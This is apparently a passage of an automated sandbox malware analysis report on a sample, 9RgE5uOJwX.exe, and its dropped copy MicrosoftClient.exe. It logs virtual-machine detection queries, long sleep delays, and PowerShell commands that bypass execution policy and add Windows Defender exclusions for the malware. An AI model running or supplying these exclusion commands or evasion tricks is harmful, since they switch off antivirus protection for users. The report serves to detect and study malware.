                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeMemory allocated: 1450000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeMemory allocated: 1B020000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeMemory allocated: 1160000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeMemory allocated: 1ABD0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeMemory allocated: 2C20000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeMemory allocated: 1AE40000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWindow / User API: threadDelayed 9665Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3743Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6046Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7349Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2208Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7702Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1978Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7435
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2220
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe TID: 2348Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1052Thread sleep count: 7435 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208Thread sleep count: 2220 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 364Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe TID: 5192Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe TID: 612Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeThread delayed: delay time: 922337203685477
                          Source: 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Adds a directory exclusion to Windows Defender
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'Jump to behavior
                          Bypasses PowerShell execution policy
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeQueries volume information: C:\Users\user\Desktop\9RgE5uOJwX.exe VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
